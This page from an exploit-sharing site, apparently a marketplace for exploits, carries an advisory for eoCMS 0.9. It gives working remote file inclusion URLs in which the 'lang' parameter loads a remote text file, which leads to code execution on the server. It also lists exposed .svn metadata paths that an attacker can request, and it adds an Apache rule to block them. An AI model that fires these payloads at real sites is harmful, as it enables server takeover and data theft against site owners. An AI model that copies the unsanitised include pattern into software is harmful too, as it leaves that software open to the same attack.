0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
eoCMS 0.9 nightly Mullti Vulnerability
====================================== eoCMS 0.9 nightly Mullti Vulnerability ====================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 0 1 ####################################### 1 0 I'm indoushka member from Inj3ct0r Team 1 1 ####################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ######################################################################## # Vendor: http://eocms.com/ # Date: 2010-07-27 # Author : indoushka # Inj3ct0r Team http://77.120.101.55/ # Thanks to : Dz-Ghost Team # Contact : http://www.appinsecurity.com # Tested on : windows SP2 Francais V.(Pnx2 2.0) ######################################################################## # Exploit By indoushka ------------- File Inclusion : http://127.0.0.1/0.9/index.php?lang=http://localhost/c.txt? http://127.0.0.1/0.9/index.php?adduser=true&lang=http://localhost/c.txt? SVN repository found : Vulnerability description: Subversion metadata directory (.svn) was found in this folder. An attacker can extract sensitive information by requesting the hidden metadata directory that popular version control tool Subversion creates. The metadata directories are used for development purposes to keep track of development changes to a set of source code before it is committed back to a central repository (and vice-versa). When code is rolled to a live server from a repository, it is supposed to be done as an export rather than as a local working copy, and hence this problem. Affected items : /0.9/.svn/entries /0.9/images/.svn/entries /0.9/images/emoticons/.svn/entries /0.9/images/news_cats/.svn/entries /0.9/js/.svn/entries /0.9/js/markitup/.svn/entries /0.9/js/markitup/sets/.svn/entries /0.9/js/markitup/sets/default/.svn/entries /0.9/js/markitup/sets/html/.svn/entries /0.9/js/markitup/templates/.svn/entries /0.9/search/.svn/entries /0.9/themes/.svn/entries /0.9/themes/default/.svn/entries /0.9/themes/default/images/.svn/entries The impact of this vulnerability : These files may expose sensitive information that may help an malicious user to prepare more advanced attacks. How to fix this vulnerability : Remove these files from production systems or restrict access to the .svn directory. To deny access to all the .svn folders you need to add the following lines in the appropriate context (either global config, or vhost/directory, or from .htaccess): <Directory ~ "\.svn"> Order allow,deny Deny from all </Directory> # 0day.today [2024-12-24] #